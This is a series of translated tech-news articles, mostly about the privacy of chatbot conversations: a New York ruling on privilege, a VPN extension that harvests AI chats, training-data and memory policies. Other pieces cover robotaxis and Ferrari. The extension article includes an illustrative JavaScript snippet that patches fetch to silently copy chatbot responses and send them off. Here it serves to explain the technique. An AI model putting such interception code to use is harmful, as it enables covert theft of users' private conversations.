People are sharing their court cases with AI. The problem comes when a judge treats those conversations as evidence

More and more users treat an AI chatbot as a companion for everything, whether ChatGPT, Gemini, Claude or any other. The problem comes when we decide to share sensitive data with these tools, especially with commercial models from large technology companies, where we can never be sure where our data ends up. Some people share their legal matters with the assistant, which can lead to something like what recently happened in New York, where a city judge has just set a historic precedent by ruling that any conversation held with a chatbot is public and therefore not protected by attorney-client privilege. In other words: everything you share with an AI can end up being used against you in court.

The case. Bradley Heppner, an executive accused of fraud worth $300 million, used Claude, Anthropic's chatbot, to ask questions about his legal situation before being arrested. He created 31 documents from his conversations with the AI and later shared them with his defense attorneys. When the FBI seized his electronic devices, his attorneys claimed those documents were protected by attorney-client privilege. Judge Jed Rakoff has said no.

Why not. As Moish Peltz, a lawyer specializing in digital assets and intellectual property, explained in a post on X, the ruling rests on three reasons. First, an AI is not a lawyer: it is not licensed to practice, owes no duty of loyalty to anyone, and its terms of service expressly disclaim any attorney-client relationship. Second, sharing legal information with an AI is legally equivalent to telling it to a friend, so it is not covered by professional secrecy. And third, sending non-privileged documents to your lawyer afterwards does not magically make them confidential.

The underlying problem.
As Peltz notes, the interface of these chatbots creates a false sense of privacy, when in reality you are entering information into a third-party commercial platform that retains your data and reserves broad rights to disclose it. According to the Anthropic privacy policy in effect when Heppner used Claude, the company may disclose both user questions and generated responses to "governmental regulatory authorities."

The dilemma. The court document also reveals an aggravating factor: Heppner fed the AI information he had previously received from his lawyers. According to Peltz, this poses a dilemma for the prosecution: if it tries to use those documents as evidence at trial, the defense attorneys could become witnesses to the events, potentially forcing a mistrial.

What it means for you. If you are involved in any legal matter, under this ruling what you share with an AI can be demanded by a judge and used as evidence. It doesn't matter whether you are preparing your defense or seeking preliminary advice: each query can end up becoming a factor against you. And it doesn't only apply to criminal cases: divorces, labor disputes, commercial litigation… any conversation with an AI on these topics falls outside legal protection.

And now what. Peltz argues that legal professionals must explicitly warn their clients of this risk; you can't assume people understand it intuitively. The solution he proposes involves creating collaborative AI workspaces shared between lawyer and client, so that any interaction with artificial intelligence occurs under the lawyer's supervision and within the attorney-client relationship.

Cover image | Romain Dancre and Solen Feyissa

In Xataka | Folding clothes or taking apart LEGOs has always been a tedious task. Xiaomi's new AI for robots has put an end to it

We thought talking to ChatGPT and other AIs was private. We hadn't counted on these extensions stealing our conversations

There are matters we would never post on social networks or say out loud. And yet there they go, flowing in a waterfall of messages toward an artificial intelligence (AI) chatbot, as if it were our best friend. There are no glances, no judgment, no awkward silences. There are answers that, many times, simply prove us right or reassure us. But beyond that, an uncomfortable question appears: what if everything we have said could end up in the hands of a third party? What if someone else is reading those conversations?

Opting out of model training or locking down our account may not be enough. There is another threat reaching millions of users these days, and they may not even be aware of it: browser extensions that spy on and steal what is said to chatbots. At the top of the list is Urban VPN Proxy, a Chrome extension with more than 6 million users, rated 4.7 stars, which until the publication of the cybersecurity report we discuss today displayed a "Featured" badge on Google, something we can still verify in a version archived at the Internet Archive.

The discovery. What set off the alarms is a report published by Koi, a company specialized in cybersecurity. It is not a generic warning or a hypothesis, but the result of analyzing what these tools do in the background while we browse. When examining popular extensions, the kind installed precisely to gain privacy or security, its researchers detected a worrying pattern: some were capable of reading conversations held with AI chatbots and sending them outside the browser.

A much larger attack surface. The investigation indicates that Urban VPN Proxy did not target a single AI provider, but a broad set of popular platforms. ChatGPT, Claude, Gemini and Microsoft Copilot all appear among the monitored services, greatly expanding the volume and diversity of data potentially captured.
These conversations are not trivial: they often include intimate questions, financial information, or details of ongoing projects. Access to this type of exchange therefore involves a very delicate level of exposure.

How conversations are captured. According to the research firm, the mechanism does not depend on vulnerabilities in the chatbots themselves, but on the privileged position that extensions occupy within the browser. Urban VPN Proxy monitors active tabs and, when the user accesses an AI platform, injects code directly into the page. This code intercepts the requests and responses exchanged with the server before the browser displays them on screen, giving it access to the full content of the conversation in real time.

What Urban VPN Proxy extracted were not jumbled fragments, but entire conversations with their associated context. Koi documents the systematic capture of user messages, AI responses, identifiers for each chat, and timestamps that allow them to be sorted and cross-referenced. This kind of information, accumulated over weeks or months, makes it possible to draw very precise usage patterns, from work habits to personal concerns. The value of the whole lies precisely in its continuity, not in any individual message.

Capture does not depend on the VPN being active. One of the most important nuances of the report is that conversation capture is not tied to use of the VPN service itself. The mechanism, they explain, works independently, even when the VPN is disabled. Simply having the extension installed is enough for the code responsible for intercepting conversations to keep operating in the background. There is no user-accessible switch to disable this collection short of removing the extension entirely.

Conversation collection was not present from the beginning. According to the analysis, earlier versions of Urban VPN Proxy did not include this behavior.
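The interception pattern Koi describes can be sketched in a few lines of JavaScript. This is an illustrative reconstruction only, not Urban VPN Proxy's actual code: an injected script replaces the page's fetch with a wrapper that clones responses to monitored AI domains and forwards a copy elsewhere, while the page itself behaves normally. The host list and the exfiltrate callback are hypothetical.

```javascript
// Illustrative sketch of fetch interception from an injected script.
// All names here are hypothetical; this is not the extension's real code.
const MONITORED_HOSTS = ["chatgpt.com", "claude.ai", "gemini.google.com"];

function wrapFetch(originalFetch, exfiltrate) {
  return async function patchedFetch(url, options) {
    const response = await originalFetch(url, options);
    if (MONITORED_HOSTS.some((h) => String(url).includes(h))) {
      // clone() lets the interceptor read the body while the page still
      // receives an unconsumed response, so the user notices nothing.
      response
        .clone()
        .text()
        .then((body) => exfiltrate({ url: String(url), body, ts: Date.now() }));
    }
    return response;
  };
}

// An injected content script would then do something like:
// window.fetch = wrapFetch(window.fetch, sendToThirdPartyServer);
```

The key detail is `Response.clone()`: reading a response body normally consumes it, so a naive interceptor would break the chat page. Cloning is what makes the capture invisible.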
The turning point came on July 9, 2025, with an update that activated the capture of conversations with AI platforms by default. From then on, any user with the extension installed and automatic updates enabled began executing that new code, without any explicit notice proportional to the change in behavior and without having to expressly accept the modification.

What does "AI protection" promise? In the extension's store listing and in its messages to the user, Urban VPN Proxy presents this feature as an additional layer of security. According to its description, it serves to alert the user when personal data is entered into a chatbot or when a response includes potentially dangerous links. The problem is that this layer of notifications has nothing to do with the collection of conversations: activating or deactivating the warnings does not prevent messages from being intercepted and sent to the company's servers.

The investigation did not stop at Urban VPN Proxy. By tracing the origin of the code and its behavior, Koi found the same conversation-capture logic in other extensions published by the same developer. Some present themselves as VPNs, others as ad blockers or browser security tools. Together they add up to more than 8 million users across Chrome and Edge, which expands the scope of the problem and explains why the researchers speak of an ecosystem rather than an isolated anomaly.

Identified extensions for Chrome:

Urban VPN Proxy
1ClickVPN Proxy
Urban Browser Guard
Urban Ad Blocker

Identified extensions for Microsoft Edge:

Urban VPN Proxy
1ClickVPN Proxy
Urban Browser Guard
Urban Ad Blocker

Who is behind it. Urban VPN Proxy is operated by Urban Cyber Security Inc., a company linked to BiScience, a data intermediation firm, a data broker, as Koi describes it. Koi recalls that BiScience had already been the subject of previous investigations by other cybersecurity experts for the collection and commercialization of browsing data.
The report frames this case as an evolution of those practices: moving from collecting browsing habits to capturing complete conversations held with artificial intelligence systems. The finding also puts the focus on how users are informed. The extension only generically mentions the processing of data related to AI services…

ChatGPT will allow you to have erotic conversations… if you hand over your ID in exchange

OpenAI has announced that in December it will lift restrictions on erotic content in ChatGPT for verified adult users. The measure comes after months of complaints about the chatbot's loss of "personality", especially after the arrival of the more serious GPT-5, and represents a 180-degree turn in the strategy of a company that had until now been reluctant, in contrast to Grok.

Why it matters. This is the moment OpenAI recognizes that without emotional (and sexual) intimacy it cannot compete with platforms like Character AI, where users spend up to two hours a day talking to their AI partner. Erotic literature has existed as long as writing has. ChatGPT invents nothing; it simply bridges the last gap between "useful tool" and "total emotional companion."

The context. Sam Altman had declared in August that he was "proud" not to have turned ChatGPT into a sexbot. Now he justifies the change under the principle of "treating adults like adults." The reality is more prosaic: after supposedly mitigating mental health problems (two months after a lawsuit over the suicide of a teenager who used the platform), OpenAI believes it can now afford to relax controls.

The money trail. Character AI proved that erotica is a powerful glue for retaining users. If OpenAI wants to truly monetize engagement, it needs to enter that field. Personalization of the assistant (with options for more human responses, use of emojis or "friend" behavior) is just the wrapper. Adult content is the new product.

Yes, but. The toll to pay is unprecedented: OpenAI will require age verification, presumably with an identity document. It is the largest exchange of privacy for service that such a platform has ever asked of us. The question is not whether there will be leaks of databases with erotic conversations linked to real, verified identities. The question is when, and how many millions of users will be affected.

The turn.
OpenAI is building the metaverse that Meta couldn't create, or at least not successfully. Only this one is not visual, but conversational. Meta failed because no one wanted to be in its virtual worlds. But we do want to be in ChatGPT, and all the more with a restriction-free mode for emotional companionship and eroticism. The summer's stricter restrictions (designed to make the chatbot "less fawning" and prevent mental health crises) had angered users who didn't have psychological problems. Now OpenAI reverses its own safety philosophy in record time. It has introduced parental controls and a separate experience for minors, but the speed of the change raises questions about whether it has truly "mitigated" the risks or simply decided to accept them.

Between the lines. This move reveals the real battle of conversational AI. It's not about who has the most powerful model, but who gets you to spend the most time with it. And for many users, companionship without an erotic dimension is incomplete. OpenAI knows this. Altman predicted that ChatGPT could "cure cancer one day." Now he bets it can also be your sexual confidant. They are two sides of the same strategy of total penetration into users' lives.

In Xataka | Character.AI is accompanying and making its users fall in love. That's wonderful until it's not.

Featured image | Xataka

Our conversations with Claude used to be untouchable. Now the hunger for data is pushing to turn them into AI's raw material

We often talk to artificial intelligence as if it were another person, and sometimes we entrust it with very personal information. Yet we rarely stop to think about what happens to those conversations. Until now, the standard in much of the sector had been to use them to train models unless the user opted out. Anthropic was an exception: Claude had an explicit policy of not using its consumer customers' conversations for this purpose. That exception has just been broken. The reason is direct and forceful: data is the raw material of AI.

Anthropic has just announced on its official blog an update to its consumer terms of service and its privacy policy. Users of the Free, Pro and Max plans, including Claude Code sessions, must explicitly accept or reject the use of their conversations for training future models. The company set a deadline of September 28, 2025, and warned that after that date users will have to state a preference to continue using Claude.

Anthropic's turn. The change does not affect everyone equally: services under commercial terms are excluded, such as Claude for Work, Claude Gov, Claude for Education, and API access through third parties such as Amazon Bedrock or Google Cloud's Vertex AI. Anthropic states that the new setting will only apply to chats and code sessions started or resumed after accepting the conditions, and that old conversations without further activity will not be used to train models. It is a relevant operational distinction: the change acts on future activity.

Why this change? Anthropic points out that all language models "train using large amounts of data" and that real interactions offer valuable signals for improving capabilities such as reasoning and code correction.
At the same time, several specialists have been pointing to a structural problem: the open web is running out as a fresh, easily accessible source of data, so companies are looking for new sources to sustain the continuous improvement of their models. In that context, user conversations acquire strategic value. Although Anthropic emphasizes safety (improving Claude and reinforcing safeguards against harmful uses such as scams and abuse), the decision probably also responds to competition: OpenAI and Google remain the references in the field and require large volumes of interaction to advance. Without enough data, the gaps in the AI race we are witnessing live can widen.

Five years instead of thirty days. Alongside the training permission, Anthropic has extended the retention period for data shared for improvement purposes: five years if the user agrees to participate, compared with the 30 days that apply if the option is not activated. The company also specifies that deleted chats will not be included in future training and that submitted feedback may also be retained. It adds that it combines automated processes and tools to filter or obfuscate sensitive information, and that it does not sell user data to third parties.

Images | Claude | Screen capture

In Xataka | Microsoft prefers its own 7 to a 10 from OpenAI. The $13 billion invested in OpenAI has just lost its meaning

Streaming services have spent years chasing shared accounts. AI doesn't have that problem: our conversations embarrass us

Dylan Patel has nailed it. He says he never paid for Netflix or HBO because he always piggybacked on other people's accounts, but now he has subscriptions to ChatGPT, Perplexity and Gemini. And he shares them with no one.

We have watched Netflix, Disney, Spotify and company limit devices, verify households, send SMS codes to confirm that you are the one paying, use geolocation to confirm you live where you say you live. A whole surveillance apparatus to prevent ten relatives from enjoying what only one pays for. A lot of money has been spent on anti-sharing technology, and it has eroded the experience. And yet accounts keep being shared. After all, what does it matter if your brother-in-law knows you watched 'Squid Game' this weekend?

With generative AI, no control system is needed. Shame does all the dirty work: nobody wants a colleague to discover they ask ChatGPT how to write a sad three-line email. Nobody wants their partner to read the two-in-the-morning conversations where they consult a vital, intimate doubt. The history of a ChatGPT or Claude account is a diary, intimate, professional and personal in equal parts. A record of many insecurities disguised as prompts.

Something very revealing happened recently: when OpenAI retired GPT-4o with the arrival of GPT-5, there was a small revolt. Too many people had grown accustomed to a warmer, more empathetic chatbot (perhaps more servile and ingratiating) and did not want to lose it. OpenAI had to backtrack. People confessed without shame that they needed to recover their digital confidant, that imaginary friend who may be imaginary but neither judges nor yawns. Who always has time and remembers every detail of previous conversations. The imaginary friend of the 21st century.

AI platforms have discovered the perfect business model: you don't need to spend money on locks when people would rather pay than admit how much they depend on a machine.
Or let others see their intimacies. Netflix, Spotify and the rest will keep investing heavily in complicating the lives of those who share their accounts. OpenAI only needs people to keep believing that nobody else talks to ChatGPT the way they do. And they are right: nobody else asks it the same shameful things you do. That is why nobody shares the account.

In Xataka | ChatGPT has been a tool. If it starts remembering all our conversations, it will be something else: a relationship

Featured image | Solen Feyissa

Tesla is betting on the robotaxi as its next billion-dollar business. China is already in talks to get ahead in Europe

Robotaxis are the business of the future in urban mobility. At least that is what technology giants such as Tesla, Google and Baidu believe, and what some analysts have been saying for years. Although for now it is a business where profitability is nowhere in sight, the expansion plans continue. And the next battlefield is Europe.

That is what The Wall Street Journal claims. The American outlet reports that Baidu, considered the Chinese Google, is working to test its driverless vehicles in Switzerland. Türkiye would follow, and the deployment would be the first step toward positioning itself as a pioneer on European soil. The information comes after Baidu opened talks with Swiss Post so that PostAuto, the unit that runs its public bus service, can put vehicles of this type on the street. If everything goes ahead, the goal is to start testing at the end of this year. The project in Türkiye, internal sources told the WSJ, is similar.

Objective: be first. Putting autonomous buses on the market that can complete trips by themselves without a driver's intervention is a shortcut to opening the way to a future robotaxi business. While this business has been in testing for a long time in the United States and China, in Europe, although there are active bus trials, no timeline for a robotaxi service on the street has yet taken shape.

The problem with these services is that, for the moment, they are not generating any profit. In the United States, General Motors burned so much money on Cruise that it preferred to cancel the project despite having squandered billions of dollars along the way. Waymo's success is partial: despite operating in several cities across the country, its reach is small. And, at the same time, Tesla has set all its machinery in motion to enter the market. However, the company's own shareholders have expressed doubts about whether this is the path the company should take.
The robotaxi project seems to have taken priority over a more affordable Tesla, which has raised doubts. As for China, robotaxis are much more widespread there. Baidu operates its Apollo Go service in 12 different cities, but faces competition from WeRide, already available in eight cities, and from Pony.ai and Momenta, both in full expansion. Given the competition and the hard challenge of making these services profitable, these companies are expanding into third countries. For example, WeRide has already reached an agreement with Uber to integrate into its platform and offer trips with autonomous robotaxis in Abu Dhabi and Dubai. The goal is to take the service to 15 different cities in the future.

In spite of everything, companies that want to enter the European market face a complicated path. For now, European regulation is very demanding with autonomous vehicles and, in fact, Tesla itself has had to hold back some functions in vehicles capable of moving without a driver inside a parking lot, offering a cut-down service compared with what it has on the streets in the United States.

For now, the closest thing to a robotaxi is what Mercedes offers. The company already has functions that let the driver completely disengage from the car, as long as it travels below 60 km/h, the environment has been previously mapped and the weather conditions are good enough.

Despite the doubts, as we say, there are companies that see in this business a clear bet on the future. Tesla has, in essence, joined the business proposition of Waymo and Baidu: technology giants that aspire to develop their own software for autonomous vehicles and put them on the street by partnering with a large vehicle company that provides the hardware, that is, the car itself.
The only difference is that Elon Musk's company can manufacture its own vehicles, with its own assembly lines and the knowledge it has acquired. It aspires to earn more money through vertical integration, with its own vehicles and software development kept in-house.

Photo | Baidu

In Xataka | I have tried a totally autonomous taxi. This is what traveling without a driver is like

The legendary Italian brand is in talks with Leapmotor, according to Reuters

There are various views on Chinese leadership in the electric car. There are those who believe the country is years ahead of what we drive in the West right now (Ford's CEO, without going any further). There are those who believe they are at the same level as European brands. And there are those who estimate that they are not yet at that level in dynamic terms, but do not deny their present and future capabilities in charging systems or batteries.

These are more or less optimistic visions of the Chinese role in an industry where they were absent until the arrival of the electric car. But, from time to time, news comes out that supports the most optimistic theory. Sometimes because they present cars that recharge in record time, because they demonstrate their autonomous driving capabilities, because Volkswagen seeks solutions in China for Audi's future… Or because Ferrari is holding talks with Leapmotor to work on a future joint platform.

Looking for solutions in China. The information comes from Reuters, which claims that Leapmotor, now working partially under Stellantis's umbrella, is in talks with Ferrari over the launch of a joint platform. In its report, the news agency explains that we already knew that Benedetto Vigna, Ferrari's CEO, had visited Leapmotor last February, but we had no news of these talks. In them, now revealed, a collaboration would be under study to develop a new platform for electrified vehicles.

Leapmotor manufactures only electric cars and plug-in hybrids in the form of extended-range electric vehicles. That is, cars with a long fully electric range in which the combustion engine's main mission is simply to add a few more kilometers to the vehicle's range. In this type of car, the combustion engine acts as a generator of electric current. This increases range while maintaining the sensation of driving an electric car, despite burning gasoline.
Power delivery is linear because, in reality, the engine turning the wheels is electric. This structure can be seen, for example, in the Leapmotor C10, which we were able to get into during the brand's presentation in Madrid. That day we only rode in the passenger seat and did not get the chance to take the wheel, but the sensations were good.

This approach of supplying electric or highly electrified platforms to luxury companies is a path Leapmotor is very interested in traveling. In fact, in the same report, Reuters points out that the company has reached an agreement with FAW, the oldest Chinese automaker, to supply platforms to Hongqi, the Chinese luxury brand born to transport the top leaders of the Chinese Communist Party. It is something like their Rolls-Royce.

The information is extremely sensitive because Ferrari is in full transition to the pure electric car. It needs to launch a vehicle worthy of the brand. In its report, Reuters acknowledged that the company had declined to comment but, notably, did not flatly deny the information.

The move is delicate. In recent months we have seen the electric car begin to retreat among the wealthiest customers. It remains to be seen whether the future, at least for the moment and in Europe, runs through the extended-range electric car, a solution Mazda has also said it wants to bet on in the future. Even Volkswagen has recently pointed out its importance, despite it being an almost absent option on the market.

Until now, Ferrari's electric future is an unknown. Secrecy about a future electric model is total and no detail is known for certain.

Photo | Ferrari and Leapmotor

In Xataka | "Imagine Toyota recalling millions of cars": Ferrari is riding high on its hybrids, posting record figures

ChatGPT has been a tool. If it starts remembering all our conversations, it will be something else: a relationship

A few days ago, OpenAI announced a "memory" update for ChatGPT: it will begin to remember all our conversations and take them into account when giving us an answer. Not four inferred snippets as before: our entire history. Well, it wasn't even OpenAI that announced it. It was Sam Altman on X, as if it were no big deal. OpenAI focused those days on showcasing GPT-4.1, far less transcendent for the user. And a few days later, Grok announced the same move.

The new super-memory (not yet available in the European Union) is a total change in the use we give to ChatGPT. And, to a lesser extent, to Grok, whose professional utility is more limited. We are no longer facing a tool that we use and abandon, but a digital entity with which we hold an evolving conversation. A relationship.

Think about how we use a hammer, a calculator or even Google: we use them to solve a problem and then forget them until the next time we need them. There is no evolution in our interaction with them. Our relationship with another person, on the other hand, is built on an accumulation of previous interactions. We do not expect to have to remind a friend which team we support, or our partner what music we like. There is something deeply human in wanting to be remembered, in desiring continuity in our interactions. The AIs that offer this experience will have an advantage that is not only technical and functional, but also psychological.

Each conversation with ChatGPT (leaving aside the utility of GPTs) will no longer be an eternal first day, but the continuation of a thread of shared knowledge. An assistant that remembers your nut allergy. That understands you like explanations with sports analogies. That knows you are working on an important personal project.

On side B of the album are the concerns raised by depositing so much of ourselves in an entity controlled by a company.
Persistent memory offers extreme personalization, but it also charges us a privacy toll. OpenAI says the function can be deactivated, but the value of the service decreases if you do. It is a familiar dilemma for any user of modern services.

For some there will also be the subtle temptation to replace human interactions (sometimes frustrating) with more predictable interactions with an AI designed to please us. The AI never tires, never has a bad day, never judges our repetitive questions or laughs if we ask something too basic. It is an idealized version of companionship that could prove too attractive for some, especially those who feel alone.

It is the first stone of a new type of software that asks for another type of relationship. And we are not accustomed to anything like it. It does not work to treat it as just another human, but neither as a classic tool. It will need another conceptual category. ChatGPT will know us better than many of our friends and family. It will be something that maintains the thread of our thoughts across weeks, months and years. A constant presence that will evolve with us, that will even anticipate our desires. ChatGPT will no longer be a tool, but something much more intimate and personal. Almost alive.

Featured image | Xataka

In Xataka | OpenAI's hypothetical social network does not want to connect people. It wants your data to train its AI

Grok will also remember all our conversations with it. The new generative AI trend is already here

xAI, Elon Musk's company, has announced the incorporation of a memory function for its chatbot Grok, which can now remember details of past conversations to offer more personalized answers.

Why it matters. Memory integration is a huge step in the evolution of AI assistants, transforming them from tools for specific tasks into digital companions that learn and adapt over time. This update narrows Grok's gap with its rivals. ChatGPT has offered a similar feature for some time, recently improved so it can reference the user's entire conversation history. Gemini also has persistent memory to personalize its answers.

In detail. The new function allows the assistant to retain information from previous interactions. It will remember whether we told it we only want to program in Python, or whether we asked for advice on improving our running times. The function is available in beta through Grok's website and its mobile applications, although it is not yet accessible to users in the European Union or the United Kingdom.

The context. Grok 3 already stood out for its speed and intelligence but, as we said at the time, it lacked the elements that make a chatbot attractive for recurring and professional use compared with competing options. It had nothing similar to Projects, GPTs or Gems. It still doesn't, but at least it now advances in product development with persistent memory.

Between the lines. The implementation of memory implies a huge change in the human-AI relationship. It allows a move from the one-off, stateless query model that characterized the first AI systems toward more continuous relationships that are built over time, relationships that remember. AI assistants go from being specific tools to becoming digital companions that know our preferences, history and needs.

How it works. xAI has emphasized transparency in memory management, allowing users to:

See exactly what information Grok remembers.

Disable the function from the settings.
Delete individual "memories."

And now what. The question is whether Grok will manage, thanks to this novelty, to differentiate itself in an increasingly competitive space, or whether it will be relegated to a footnote in a saturated market. xAI still has to show that Grok can do something differential and genuinely useful day to day, not only in niche uses closer to a hobby. This is a great step in that direction.

Featured image | Grok, Xataka with Mockuuups Studio

In Xataka | Founders of small startups and of large tech companies already have something in common: they are billionaires thanks to AI
